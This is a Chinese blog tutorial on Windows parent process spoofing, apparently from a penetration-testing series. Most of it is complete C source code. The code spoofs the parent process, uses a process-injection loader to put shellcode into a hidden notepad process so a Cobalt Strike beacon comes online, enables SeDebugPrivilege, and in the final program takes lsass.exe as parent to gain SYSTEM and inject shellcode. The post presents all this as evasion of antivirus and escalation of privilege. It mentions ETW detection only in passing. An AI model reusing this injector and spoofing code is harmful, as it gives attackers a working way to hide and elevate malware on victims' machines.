进程链信任-父进程欺骗

文章目录

    • 前记
    • 普通权限的父进程欺骗
    • ShllCode上线
    • 进程提权基础
    • 进程提权注入

前记

父进程欺骗作用:

  • 进程链信任免杀
  • 进程提权

检测:

  • etw

普通权限的父进程欺骗

#include
#include
#include 

DWORD getpid(LPCTSTR ProcessName)
{
	HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProceessnap == INVALID_HANDLE_VALUE)
	{
		puts("创建进行快照失败\n");
		return 0;
	}
	else
	{
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		BOOL hProcess = Process32First(hProceessnap, &pe32);
		while (hProcess)
		{
			if (_wcsicmp(ProcessName, pe32.szExeFile) == 0)
			{
				printf("pid:%d\n", pe32.th32ProcessID);
				//printf("ppid:%d", pe32.th32ParentProcessID);
				CloseHandle(hProceessnap);
				return pe32.th32ProcessID;
			}
			hProcess = Process32Next(hProceessnap, &pe32);
		}
	}
	CloseHandle(hProceessnap);
	return 0;
}
int main()
{
	//initialization
	PROCESS_INFORMATION pi = { 0 };
	STARTUPINFOEXA si = { 0 };
	SIZE_T sizeToAllocate;
	si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
	//getparenthandle
	DWORD pid = getpid(L"x64dbg.exe");
	HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
	//UpdateProcThreadAttribute
	InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);
	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
	UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
	//CreateProcess
	CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
	system("pause");
	return 0;
}

关键api、结构体

CreateProcessA

BOOL CreateProcessA(
  [in, optional]      LPCSTR                lpApplicationName,
  [in, out, optional] LPSTR                 lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCSTR                lpCurrentDirectory,
  [in]                LPSTARTUPINFOA        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);

PROCESS_INFORMATION

typedef struct _PROCESS_INFORMATION {
  HANDLE hProcess;
  HANDLE hThread;
  DWORD  dwProcessId;
  DWORD  dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;

STARTUPINFOEXA

typedef struct _STARTUPINFOEXA {
  STARTUPINFOA                 StartupInfo;
  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
} STARTUPINFOEXA, *LPSTARTUPINFOEXA;

HeapAlloc

DECLSPEC_ALLOCATOR LPVOID HeapAlloc(
  [in] HANDLE hHeap,
  [in] DWORD  dwFlags,
  [in] SIZE_T dwBytes
);

UpdateProcThreadAttribute

BOOL UpdateProcThreadAttribute(
  [in, out]       LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,
  [in]            DWORD                        dwFlags,
  [in]            DWORD_PTR                    Attribute,
  [in]            PVOID                        lpValue,
  [in]            SIZE_T                       cbSize,
  [out, optional] PVOID                        lpPreviousValue,
  [in, optional]  PSIZE_T                      lpReturnSize
);

PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

lpValue 参数是指向要使用的进程的句柄的指针,而不是作为所创建进程的父进程的调用进程。 要使用的进程必须具有 PROCESS_CREATE_PROCESS 访问权限。

从指定进程继承的属性包括句柄、设备映射、处理器相关性、优先级、配额、进程令牌和作业对象。 (请注意,某些属性(如调试端口)将来自创建过程,而不是此 handle.)

QueueUserAPC

DWORD QueueUserAPC(
  [in] PAPCFUNC  pfnAPC,
  [in] HANDLE    hThread,
  [in] ULONG_PTR dwData
);

ShllCode上线

#include
#include
#include 

DWORD getpid(LPCTSTR ProcessName)
{
	HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProceessnap == INVALID_HANDLE_VALUE)
	{
		puts("创建进行快照失败\n");
		return 0;
	}
	else
	{
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		BOOL hProcess = Process32First(hProceessnap, &pe32);
		while (hProcess)
		{
			if (_wcsicmp(ProcessName, pe32.szExeFile) == 0)
			{
				printf("pid:%d\n", pe32.th32ProcessID);
				//printf("ppid:%d", pe32.th32ParentProcessID);
				CloseHandle(hProceessnap);
				return pe32.th32ProcessID;
			}
			hProcess = Process32Next(hProceessnap, &pe32);
		}
	}
	CloseHandle(hProceessnap);
	return 0;
}
int main()
{
	//initialization
	PROCESS_INFORMATION pi = { 0 };
	STARTUPINFOEXA si = { 0 };
	SIZE_T sizeToAllocate;
	si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
	//getparenthandle
	DWORD pid = getpid(L"x64dbg.exe");
	HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
	//UpdateProcThreadAttribute
	InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);
	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
	UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
	//CreateProcess
	unsigned char shellcode[] = "";
	CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE,CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
	LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x2000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);
	CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);
	CloseHandle(pi.hThread);
	return 0;
}

进程链信任-父进程欺骗_第1张图片

这里cs以notepad进程的分线程上线,当notepad被关闭时cs会被下线

进程提权基础

流程

1.打开进程访问令牌
2.取得特权的LUID值
3.调整访问令牌特权值

使用api,结构体

OpenProcessToken

BOOL OpenProcessToken(
  [in]  HANDLE  ProcessHandle,
  [in]  DWORD   DesiredAccess,
  [out] PHANDLE TokenHandle
);

LookupPrivilegeValue

BOOL LookupPrivilegeValueA(
  [in, optional] LPCSTR lpSystemName,
  [in]           LPCSTR lpName,
  [out]          PLUID  lpLuid
);

AdjustTokenPrivileges

BOOL AdjustTokenPrivileges(
  [in]            HANDLE            TokenHandle,
  [in]            BOOL              DisableAllPrivileges,
  [in, optional]  PTOKEN_PRIVILEGES NewState,
  [in]            DWORD             BufferLength,
  [out, optional] PTOKEN_PRIVILEGES PreviousState,
  [out, optional] PDWORD            ReturnLength
);

TOKEN_PRIVILEGES

typedef struct _TOKEN_PRIVILEGES {
  DWORD               PrivilegeCount;
  LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES, *PTOKEN_PRIVILEGES;

LUID_AND_ATTRIBUTES

typedef struct _LUID_AND_ATTRIBUTES {
  LUID  Luid;
  DWORD Attributes;
} LUID_AND_ATTRIBUTES, *PLUID_AND_ATTRIBUTES;

EnableDebugPrivilege代码如下

#include 
#include 
BOOL  EnableDebugPrivilege()
{
    HANDLE token_handle;
    LUID luid;
    TOKEN_PRIVILEGES tkp;
    //打开访问令牌
    if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&token_handle))
    {
        printf("openProcessToken error");
        return   FALSE;
    }
    //查询luid
    if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
    {
        CloseHandle(token_handle);
        printf("lookupPrivilegevalue error");
        return   FALSE;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = luid;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    //调整访问令牌权限
    if (!AdjustTokenPrivileges(token_handle,FALSE,&tkp,sizeof(tkp),NULL,NULL))
    {
        CloseHandle(token_handle);
        printf("adjust error");
        return   FALSE;
    }
    printf("sucessful");
    return TRUE;
}
int main()
{
    EnableDebugPrivilege();
    system("pause");
    return 0;
}

进程提权注入

#include "coleak.h"

BOOL  EnableDebugPrivilege()
{
	HANDLE token_handle;
	LUID luid;
	TOKEN_PRIVILEGES tkp;
	//打开访问令牌
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle))
	{
		printf("openProcessToken error");
		return   FALSE;
	}
	//查询luid
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
	{
		CloseHandle(token_handle);
		printf("lookupPrivilegevalue error");
		return   FALSE;
	}
	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = luid;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	//调整访问令牌权限
	if (!AdjustTokenPrivileges(token_handle, FALSE, &tkp, sizeof(tkp), NULL, NULL))
	{
		CloseHandle(token_handle);
		printf("adjust error");
		return   FALSE;
	}
	printf("sucessful");
	return TRUE;
}

DWORD getpid(LPCTSTR ProcessName)
{
	HANDLE hProceessnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hProceessnap == INVALID_HANDLE_VALUE)
	{
		puts("创建进行快照失败\n");
		return 0;
	}
	else
	{
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		BOOL hProcess = Process32First(hProceessnap, &pe32);
		while (hProcess)
		{
			if (_wcsicmp(ProcessName, pe32.szExeFile) == 0)
			{
				printf("pid:%d\n", pe32.th32ProcessID);
				//printf("ppid:%d", pe32.th32ParentProcessID);
				CloseHandle(hProceessnap);
				return pe32.th32ProcessID;
			}
			hProcess = Process32Next(hProceessnap, &pe32);
		}
	}
	CloseHandle(hProceessnap);
	return 0;
}

VOID ppidfunc(DWORD pid) {
	PROCESS_INFORMATION pi = { 0 };
	STARTUPINFOEXA si = { 0 };
	SIZE_T sizeToAllocate;
	si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
	//getparenthandle
	HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
	//UpdateProcThreadAttribute
	InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);
	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
	UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
	//CreateProcess
	unsigned char shellcode[] = "";
	CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
	LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x2000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);
	CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	CloseHandle(parentProcessHandle);
}

int main() {
	// 进程提权
	EnableDebugPrivilege();
	// 找指定进程pid
	DWORD pid = getpid(L"lsass.exe");
	// 父进程欺骗
	ppidfunc(pid);
	system("pause");
	return 0;
}

你可能感兴趣的:(#,渗透测试,windows,安全)